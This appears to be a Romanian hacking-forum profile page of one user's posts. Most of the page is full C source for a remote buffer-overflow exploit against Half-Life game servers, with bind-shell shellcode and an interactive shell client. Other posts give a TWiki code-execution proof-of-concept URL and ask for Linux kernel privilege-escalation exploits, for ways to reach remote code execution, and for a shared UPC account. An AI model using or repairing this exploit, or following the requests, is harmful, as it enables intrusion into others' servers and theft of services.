cyadron
-
Posts
34 -
Joined
-
Last visited
Posts posted by cyadron
-
-
Este cineva binevoitor care poate sa sharuiasca un cont de UPC?
-
Ati avut ceva succes?
Eu am mereu aceeasi eroare:
[*] Started reverse double handler
[*] Checking if target is vulnerable...
[-] Exploit aborted due to failure: exploit: Vulnerability check failed.
-
Mersi Nytro.
Stie cineva cum se poate citi o valoare din DB in loc de update?
-
Stie cineva cum se poate transforma:
SELECT * FROM {users} WHERE name = :namein
SELECT * FROM {users} WHERE name IN (:name_0, :name_1)?
-
Acum nu ramane decat sa scriem noi PoC...
-
poti folosi \t(tab) acolo unde ai nevoie de spatiu
-
Nu uita sa faci escape la caractere precum "/" cu "\". Ex: http:// va deveni http:\/\/
-
Multam dany.
-
http://www.example.com/twiki/bin/view/Main/WebHome?debugenableplugins=BackupRestorePlugin%3bprint("Content-Type:text/html\r\n\r\nVulnerable!")%3bexitThe TWiki site is vulnerable if you see a page with text "Vulnerable!".
Source:Twiki Perl Code Execution ? Packet Storm
Acum singura chestie care mai ramane de facut e sa ajungeti la RCE.
Daca are cineva vreo metoda va rog...
-
Vreau doar sa zic ca am vorbit cu Brenin, si este serios si de treaba. Recomand!
-
Ti se pare tie ca este unul dintre cele mai bune. Daca nu a fost inclus, inseamna ca merita sa nu fie inclus. Testele celor de la av-comparatives.org sunt foarte relevante si se bazeaza pe date exacte.
Probabil ca nu ai observat ca in ultimul report de pe av-comparatives.org se afla si ESET in primele 6.
-
Se pare ca unul dintre cele mai bune nu a fost inclus in acest top. NOD32
-
ok, am gasit problema. Incercam sa vizualizez fisierul direct si bineinteles ca nu mergea. Am gasit un workaround sa il encodez intai cu base64 si apoi sa il decodez.
-
Stiu ca asa ar trebui dar totusi imi da eroare daca incerc sa citesc de exemplu index.php. Stiu ca fisierul exista pentru ca pot de exemplu sa citesc din acelasi folder .htaccess. Eroarea care o am este 631 - failed to parse request.
-
Am reusit sa vad /etc/passwd. Dar cam atat. Cred ca nu am permisii sa vad alte fisiere...
-
Ati avut ceva noroc ? Nu prea poti sa faci mare lucru, merge sa vezi /etc/passwd dar cam atat...
-
Asa este.
Desi apare ca fiind "by r3dm0v3" nu este de fapt inregistrat.
-
env[0]="/usr/bin/gpasswd"; // some suid file
Conteaza ce fisier folosim exploit? Sau poate sa fie oricare...
-
Conform Index of /pub/linux/kernel/v2.6 kernel-ul 2.6.24.7 este de pe: ChangeLog-2.6.24.7 07-May-2008
-
Linux Kernel 2.6.x ptrace_attach Local Privilege Escalation Exploit
E din 2009.Il gasesti aici :
http://milw0rm.com/exploits/8673
Mersi, da eu nu am avut succes cu asta. am testat pe 2 servere si nimic.. mai incercam.. oare h00lyshit ar merge?
-
Mersi mult pentru exploituri. Acum... este cumva vreun exploit bun pentru 2.6.24.7. Sau poate chiar ceva 2.6.x
-
Chiar daca am AMD trebuie sa dau un vot pentru intel + ATI vga
-
Si la ce ar trebui sa ma uit pe linku asta?
-
/*****************************************************************
* hoagie_hlserver.c
*
* Remote exploit for Halflife-Servers.
*
* Binds a shell to port 30464/tcp and connects to it.
*
* Author: KnbykL <info@knbykl.org>
*
* Thnx : All Soldier HbT
*
* This hole was found by Auriemma Luigi.
* Uses code from the proof-of-concept DoS-exploit by Auriemma Luigi.
*
* Tested with HL-Server v3.1.1.0. Works only with the Linux server
* (though making a Win32-exploit should be trivial)
*
* How this exploit works:
* There is a buffer on the stack that is being overwritten with
* our supplied shellcode. Too bad that it lies on an address that
* has 0xFF in it (e.g. 0xbfffe000) and half life filters these
* characters out, so we can't write the address of the shellcode
* there.
* Luckily, the function that copies the shellcode into the buffer
* has the address of the buffer in %eax when it exits. So, we jump
* to the location 0x0804AE93 (which is the same in ALL half life
* servers, thanks to the fact that it is a binary distrubtion)
* where the instruction "call *%eax" is located. And so the shellcode
* gets executed...
*
* Dil : Türkçe'min her zaman arkasýndayým.
*
* THIS FILE IS FOR STUDYING PURPOSES ONLY AND A PROOF-OF-CONCEPT.
* THE AUTHOR CAN NOT BE HELD RESPONSIBLE FOR ANY DAMAGE OR
* CRIMINAL ACTIVITIES DONE USING THIS PROGRAM.
*
*****************************************************************/
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <time.h>
#include <unistd.h>
#include <sys/socket.h>
#include <sys/types.h>
#include <arpa/inet.h>
#include <netdb.h>
#define VER "0.1"
#define BUFFSZ 4096
#define PORT 27015
#define INFO "\xff\xff\xff\xff" \
"infostring\n\0"
#define GETCH "\xff\xff\xff\xff" \
"getchallenge\n\0"
#define TIMEOUT 5 /* 5 seconds */
#define PICOFFSET 0xD0404
// 13*13+5=174
// 5*16+13+43+7*16+12=260
// 260-174 = 86 NOPs = 6*13+8
#define PAYLOAD "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90" \
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90" \
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90" \
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90" \
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90" \
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90" \
"\x90\x90\x90\x90" \
"\x31\xc0\x40\x40\xcd\x80\x89\xc0\x85\xc0\x74\x06\x31" \
"\xc0\xb0\x01\xcd\x80\x31\xc0\x31\xdb\x31\xc9\x31\xd2" \
"\xb0\x66\xb3\x01\x51\xb1\x06\x51\xb1\x01\x51\xb1\x02" \
"\x51\x8d\x0c\x24\xcd\x80\xb3\x02\xb1\x02\x31\xc9\x51" \
"\x51\x51\x80\xc1\x77\x66\x51\xb1\x02\x66\x51\x8d\x0c" \
"\x24\xb2\x10\x52\x51\x50\x8d\x0c\x24\x89\xc2\x31\xc0" \
"\xb0\x66\xcd\x80\xb3\x01\x53\x52\x8d\x0c\x24\x31\xc0" \
"\xb0\x66\x80\xc3\x03\xcd\x80\x31\xc0\x50\x50\x52\x8d" \
"\x0c\x24\xb3\x05\xb0\x66\xcd\x80\x89\xc3\x31\xc9\x31" \
"\xc0\xb0\x3f\xcd\x80\x41\x31\xc0\xb0\x3f\xcd\x80\x41" \
"\x31\xc0\xb0\x3f\xcd\x80\x31\xdb\x53\x68\x6e\x2f\x73" \
"\x68\x68\x2f\x2f\x62\x69\x89\xe3\x8d\x54\x24\x08\x31" \
"\xc9\x51\x53\x8d\x0c\x24\x31\xc0\xb0\x0b\xcd\x80\x31" \
"\xc0\xb0\x01\xcd\x80" \
/* EIP */ "%c%c%c%c%c%c%c%c%c%c%c%c"
// "BBBB"
/* PAYLOAD is 268 bytes! */
#define MODEL "robo"
#define NAME "]I[gore"
#define TOPCOLOR "25" /* 0-255, it's NOT important */
#define BOTTOMCOLOR "161" /* 0-255, it's NOT important */
#define BOF1 "\xff\xff\xff\xff" \
"connect %d" \
" %s \"" \
"\\prot\\2" \
"\\unique\\-1" \
"\\raw\\%08lx%08lx%08lx%08lx" \
"\" \"" \
"\\model\\" MODEL \
"\\topcolor\\" TOPCOLOR \
"\\bottomcolor\\" BOTTOMCOLOR \
"\\rate\\9999.000000" \
"\\cl_updaterate\\20" \
"\\cl_lw\\1" \
"\\cl_lc\\1" \
"\\cl_dlmax\\128" \
"\\hud_classautokill\\1" \
"\\name\\" NAME \
"\\" PAYLOAD "\\value" \
"\"\n"
#define BUGNUM "" \
int exec_sh(int sockfd)
{
char snd[4096],rcv[4096];
fd_set rset;
while(1)
{
FD_ZERO(&rset);
FD_SET(fileno(stdin),&rset);
FD_SET(sockfd,&rset);
select(255,&rset,NULL,NULL,NULL);
if(FD_ISSET(fileno(stdin),&rset))
{
memset(snd,0,sizeof(snd));
fgets(snd,sizeof(snd),stdin);
write(sockfd,snd,strlen(snd));
}
if(FD_ISSET(sockfd,&rset))
{
memset(rcv,0,sizeof(rcv));
if(read(sockfd,rcv,sizeof(rcv))<=0)
exit(0);
fputs(rcv,stdout);
}
}
}
int connect_sh(char *server)
{
int sockfd,i;
struct sockaddr_in sin;
struct hostent *he;
printf("Connect to the shell\n");
fflush(stdout);
memset(&sin,0,sizeof(sin));
sin.sin_family=AF_INET;
sin.sin_port=htons(30464);
if((he=gethostbyname(server))<0) perror("gethostbyname"), exit(1);
memcpy(&sin.sin_addr,*(he->h_addr_list),sizeof(sin.sin_addr));
if((sockfd=socket(AF_INET,SOCK_STREAM,0))<0)
{
printf("Can't create socket\n");
exit(0);
}
if(connect(sockfd,(struct sockaddr *)&sin,sizeof(sin))<0)
{
printf("Can't connect to the shell\n");
exit(0);
}
return sockfd;
}
int getproto(unsigned char *buff);
int timeout2(int sock);
kene showinfostring(unsigned char *buff, int size);
u_long resolv(char *host);
kene std_err(kene);
int main(int argc, char *argv[]) {
unsigned char buffrecv[BUFFSZ],
buffsend[sizeof(BOF1) + 64],
challenge[16],
bug,
*bofstr,
*stri,
*strf;
struct sockaddr_in peer;
int sd,
err,
rlen,
bufflen,
proto;
unsigned long offset;
setbuf(stdout, NULL);
if(argc < 2) {
printf("\nUsage: %s <host> <port>\n\n", argv[0], PORT);
exit(1);
}
printf("OK team, follow my command.\n");
srand(time(NULL));
bofstr=BOF1;
peer.sin_addr.s_addr = resolv(argv[1]);
peer.sin_port = htons(atoi(argv[2]));
// offset=strtoul(argv[3],NULL,16);
peer.sin_family = AF_INET;
rlen = sizeof(peer);
offset=0x0804AE93; // call eax
printf("Using offset 0x%08x...\n",offset);
sd = socket(AF_INET, SOCK_DGRAM, IPPROTO_UDP);
if(sd < 0) std_err();
/* GET INFORMATIONS */
err = sendto(sd, INFO, sizeof(INFO) - 1, 0, (struct sockaddr *)&peer, rlen);
if(err < 0) std_err();
err = timeout2(sd);
if(err < 0) {
fputs("\nError: socket timeout\n", stdout);
exit(1);
}
err = recvfrom(sd, buffrecv, BUFFSZ, 0, (struct sockaddr *)&peer, &rlen);
if(err < 0) std_err();
buffrecv[err] = 0x00;
proto = getproto(buffrecv);
showinfostring(buffrecv, err);
/* GET CHALLENGE NUMBER */
err = sendto(sd, GETCH, sizeof(GETCH) - 1, 0, (struct sockaddr *)&peer, rlen);
if(err < 0) std_err();
err = timeout2(sd);
if(err < 0) {
fputs("\nError: socket timeout\n", stdout);
exit(1);
}
err = recvfrom(sd, buffrecv, BUFFSZ, 0, (struct sockaddr *)&peer, &rlen);
if(err < 0) std_err();
buffrecv[err] = 0x00;
stri = strchr(buffrecv, 0x20);
if(!stri) stri = buffrecv;
strf = strchr(stri + 1, 0x20);
if(!strf) strf = buffrecv + err;
*strf = 0x00;
strncpy(challenge, stri, 16);
printf("Challenge: %s\n", challenge);
bufflen = snprintf(buffsend,
sizeof(BOF1) + 64,
bofstr,
proto,
challenge,
(long)(rand() << 1) + (rand() & 0xf), /* 31bit */
(long)(rand() << 1) + (rand() & 0xf),
(long)(rand() << 1) + (rand() & 0xf),
(long)(rand() << 1) + (rand() & 0xf),
offset&0xFF,(offset>>8)&0xFF,(offset>>16)&0xFF,(offset>>24)&0xFF,
offset&0xFF,(offset>>8)&0xFF,(offset>>16)&0xFF,(offset>>24)&0xFF,
offset&0xFF,(offset>>8)&0xFF,(offset>>16)&0xFF,(offset>>24)&0xFF);
if(bufflen < 0) {
fputs("\nError: cannot allocate buffer in memory\n", stdout);
exit(1);
}
printf("Sending deadly packet ... stand by\n");
err = sendto(sd, buffsend, bufflen, 0, (struct sockaddr *)&peer, rlen);
if(err < 0) std_err();
err = timeout2(sd);
if(err < 0) {
fputs("\nResult: The remote server IS vulnerable!!!\n", stdout);
exec_sh(connect_sh(argv[1]));
return(0);
}
err = recvfrom(sd, buffrecv, BUFFSZ, 0, (struct sockaddr *)&peer, &rlen);
if(err < 0) std_err();
buffrecv[err] = 0x00;
printf("Connect: %s\n", buffrecv + 5);
close(sd);
fputs("\nResult: The server doesn't seems to be vulnerable\n\n", stdout);
return(0);
}
int getproto(unsigned char *buff) {
int p;
unsigned char *ptr;
ptr = strstr(buff + 23, "protocol");
if(ptr) {
p = atoi(ptr + 9);
} else {
fputs("\nError: No protocol informations in the answer of the server\n", stdout);
exit(1);
}
return(p);
}
kene showinfostring(unsigned char *buff, int size) {
int nt = 1,
len;
unsigned char *string;
fputs("\n--------------------------------------------------\n", stdout);
if(memcmp(buff + 1, "\xff\xff\xff", 3)) {
fputs("\nError: Bad answer from the server (it is not a true server)\n", stdout);
exit(1);
}
len = strlen(buff);
if(len < size) buff += len + 1;
while(1) {
string = strchr(buff, '\\');
if(!string) break;
*string = 0x00;
/* \n or \t */
if(!nt) {
printf("%s: ", buff);
nt++;
} else {
printf("%s\n", buff);
nt = 0;
}
buff = string + 1;
}
printf("%s\n", buff);
}
int timeout2(int sock) {
struct timeval timeout;
fd_set fd_read;
int err;
timeout.tv_sec = TIMEOUT;
timeout.tv_usec = 0;
FD_ZERO(&fd_read);
FD_SET(sock, &fd_read);
err = select(sock + 1, &fd_read, NULL, NULL, &timeout);
if(err < 0) std_err();
if(err == 0) return(-1);
return(0);
}
u_long resolv(char *host) {
struct hostent *hp;
u_long host_ip;
host_ip = inet_addr(host);
if(host_ip == INADDR_NONE) {
hp = gethostbyname(host);
if(!hp) {
printf("\nError: Unable to resolve hostname (%s)\n", host);
exit(1);
} else host_ip = *(u_long *)(hp->h_addr);
}
return(host_ip);
}
kene std_err(kene)
{
perror("\nError");
exit(1);
}Eu nu am reusit sa il compilez, daca reuseste cineva il rog sa posteze varianta "reparata"
Vulnerability in ESET NOD32 Licence Activation generates unlimited usernames and pass
in Exploituri
Posted
Foarte tare, din pacate a fost reparat.